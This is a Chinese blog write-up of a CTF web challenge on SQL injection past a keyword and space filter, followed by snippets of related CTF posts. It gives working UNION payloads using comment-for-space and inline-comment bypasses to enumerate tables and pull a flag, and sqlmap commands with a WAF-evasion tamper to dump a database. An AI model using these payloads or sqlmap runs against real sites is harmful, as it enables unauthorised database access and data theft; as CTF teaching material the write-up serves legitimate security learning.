CTF-Web3-(SQL简单过滤绕过)

最新推荐文章于 2022-12-16 19:30:39 发布
最新推荐文章于 2022-12-16 19:30:39 发布
阅读量1.6k 收藏 5
点赞数 1
分类专栏: CTF-Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39934520/article/details/107560221
版权

3.简单的sql注入

思路:

检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习)
1.基于报错的检测方法
一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注
入点。
2.基于布尔的检测方法---(这只是最基础的判断)
这种方法是输入:

  • 1 and 1=1 ,通常这种情况会正常返回数据
  • 1 and 1=2 ,通常这种情况不会返回数据或者直接报错

或者

  • 1' and '1'='1 ,通常这种情况会正常返回数据
  • 1' and '1'='2 ,通常这种情况不会返回数据或者直接报辑

或者 ---(使用双引号)

如果以上都判断不出,就要考虑盲注了。

分析:
假如后台处理数据的sq语句(后台在输入上加了单引号)是:
     select name from user where id=' our_ input '
我们输入1' and '1'='1 , sq语句变为:
    select name from user where id='1' and 1'='1'
后台数据库仍然正常读取数据.
我们输入1' and '1'='2 , sq语句变为:
    select name from user where id='1' and '1'='2’
这样查询条件为假,数据库不能读取数据。

初步判断为单引号字符型注入,然后输入1 and 1=1 ,可以看到过滤了and并且空格被替换为了+ ,因此我们可以推断,这个题过滤了常用的sq|命令,可以
输入union and select from进行下测试,发现果然全被过滤掉了

补充:当空格被过滤时,通常用()或者/**/代替空格

爆数据库

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

发现数据库较多,尝试直接爆表

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

表太多了:

不过也暴露出了,我们想要的数据表。

爆字段,然而……报错了,information_schema.columns被过滤了

 

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1

所以就猜测字段名也是flag,试一下:(做CTF题,思路要活跃)

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

flag{Y0u_@r3_5O_dAmn_90Od}

其他补充:

我们尝试单引号:

 

 发现单引号没有被过滤,然后尝试逻辑运算,and被过滤了但还好or没有被过滤:

我们知道他过滤了很多关键字:and,select,from,union,where,但我们可以绕过关键字,方法有:关键字中间加/**/隔断,/*!关键字*/,关键字中间加%0b隔断,关键字重写(如:aandnd),大小写混合,双空格等等,尝试后/*!*/可以绕过,还是按套路,先拿flag做表名和字段名试试:

 说明存在flag表,那基本就是老套路了,可以继续用这个方法验证,下面我就直接爆flag了:

ps:这里还有一种检验表名是否存在的方式:

注意还可以尝试这个方法

用‘+‘号来代替空格:?id=1‘+union+select+flag+from+flag+wherewhere+‘t‘=‘t

使用Sqlmap:

来自:https://blog.csdn.net/dongyanwen6036/article/details/77825479

基于windows下的sqlmap:

这里我们会用到tamper,是Python写的,sqlmap一般自带,主要的作用是绕过WAF ,空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。
这里用的level参数是执行测试的等级(1-5,默认为1) ,sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头的值,当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。

E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

 

继续在web1数据库中查找

E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 --table

(注意这里命令应该是 --tables 而这里用 --table也能成功,长见识了)


继续找吧

E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag --column



接下来就直接看结果吧

E:\CTF\sqlmap>python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment -D web1 -T flag -C flag --dump


完。

红烧兔纸
关注
专栏目录
[ctf sql]绕过sql语句过滤
qq_37301470的博客
11-12 668
过滤 过滤 单引号 逃逸出攻击语句 php语句 sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd"]'; 如果能同时传值给name和pwd 那么 name=admin\ pwd= and 1=1 # 拼接后 sql= select * form users where username='admin\' and password ='and 1=1 #'; 成功令后一个pwd的引号与name的引
CTFweb学习记录 -- SQL注入检测绕过
lifanxin的博客
05-19 1014
SQL注入检测绕过概述大小写绕过双写绕过编码绕过内联注释绕过总结 概述   在学习了一些基本的sql注入知识以及注入技巧后,本篇博客将会总结一些常见的sql注入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到注入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过ctf比赛中十分
ctf-web3
gofreshman的博客
12-01 271
sql注入型题目
CTF-web3
Zhang_hongchao的博客
01-08 302
打开网址能看到以下信息: $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 代码的涵义, $what=$_GET['what']; //GET 方式获取参数what echo $what; //输出what 参数的值 if($what=='flag') //if 判断 $what 是否等于 flag echo'flag{****}'; 通过GET 方式(URL)获取一个参数,参数名是`what`。 直接提交
CTF-web-web3
三天不打上房揭瓦的博客
08-25 477
前言:小编也是现学现卖,方便自己记忆,写的不好的地方还请包涵,也欢迎各位大佬多多批评指正 网址:web-web3 1.进入网址可以看到一个弹框,先阻止弹框。 2.右键查看源代码,发现是js代码,alert函数的弹框。 3.划到最下面,发现一串 HTML 编码 4.打开bp 或者其它编码软件进行解码。我这里使用bp进行解码。 将后面三个l 去掉,得到flag为:KEY{J2sa42ahJK-HS11} ...
Bugku CTF web3
qq_61768489的博客
04-25 900
字符?正则? <?php highlight_file('2.php'); $key='flag{********************************}'; $IM= preg_match("/key.*key.{4,7}key:\/.\/(.*key)[a-z][[:punct:]]/i", trim($_GET["id"]), $match); if( $IM ){ die('key is: '.$key); } ?> trim()移除空白字符 这个文章超棒
Bugku CTF web3Web
ChaoYue_miku的博客
02-14 271
0、打开网页,查看PHP源码 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 用GET方法上传参数what=flag即可 1、得到flag:flag{b201fba34aa17859887d45dc5b248bae}
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
8. **Web应用防火墙(WAF)**:了解WAF的工作原理,以及如何绕过和配置WAF以提高安全性。 9. **源代码审查**:学习通过查看源代码发现潜在的安全问题,以及如何编写更安全的代码。 10. **逆向工程与调试**:对于...
CTF-WEB总结之SQL注入
weixin_41038905的博客
05-01 737
简介 SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。 Union注入 利用内置函数爆数据库信息及相关信息 version() database() user() current_user() @@datadir数据库路径 @@basedir mysql安装路径 @@ver...
CTFHUB-web-SQL注入
ookami6497的博客
11-29 828
CTFHUB SQL
ctf-web
weixin_43150428的博客
11-04 2785
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
论剑CTF web-3
m0_46587008的博客
10-25 351
1.web-3 进入环境,发现upload,点开看看 那就开始上传 根据回显推测应该是白名单,# 1.web-3 进入环境,发现upload,点开看看那就开始上传根据回显推测应该是白名单,比较难突破。但是看一眼URL发现有点小惊喜 http://123.206.31.85:10003/?op=upload 这里传进去的参数是op=upload,这个opload应该是一个文件名,推测这里可能是文件包含,在index.php中包含了upload文件才出现的这个上传界面。 2.思路 进入环境,发现u
ctf.show web3
m0_63028223的博客
04-25 1443
打开题目,出现提示,php文件?,考虑文件包含漏洞。 输入参数:?url=/etc/passwd 这个报错界面出来了,说明存在文件包含漏洞 构造url值 =php://input 使用php协议 使用burp抓包 使用ls命令查看php下的文件 得到文件路径。。。。 使用cat方法查看 最终得到flag。。。。。。。。 发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
bugku ctf web3
qq_42777804的博客
08-12 851
这么一道题 打开后发现 一直是这两个界面                         花里胡哨   直接查看源代码(有的浏览器不可以 ,可以尝试一下 火狐)   发现最最后那一堆Unicode编码的注释可疑 &lt;!--&amp;#75;&amp;#69;&amp;#89;&amp;#123;&amp;#74;&amp;#50;&amp;#115;&amp;#...
[CTF]Web SQL绕过过滤注入(异或、弱比较注入)
V1040375575的博客
12-25 2117
文章目录前言一、首先看题二、解题步骤1、通过burpsuite抓取登陆包:2、通过bp爆破passwd字段3、使用bp对uname字段进行sql fuzz4、注入方法5、登陆后台 前言 学习ctf记录,CTF Web SQL 绕过过滤注入 一、首先看题 提  示: !,!=,=,+,-,^,% 描  述: 全都过滤了绝望吗? 这里可以看到提示,似乎将许多关键字给过滤了,访问题目网站后,看到一个login登陆页面,结合题目分析应该是一个sql注入+绕过。 二、解题步骤 1、通过burpsuite抓取登
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
10-ctf-web3
a1533759138的博客
07-14 144
10-ctf-web3
ctfshow web3
最新发布
m0_73660182的博客
12-16 285
抓包
ctf-WEB-都过滤
god_001的博客
05-09 1073
题目地址:跳转提示 打开网址,看到一个登陆页面: 首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=... 发现'#','-- ',' ','or','and','/*'都被过滤了 尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合 输入用户名为a'-'0,密码123 发现结果显示密码错误 可推出,确实是单引号闭合 原.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值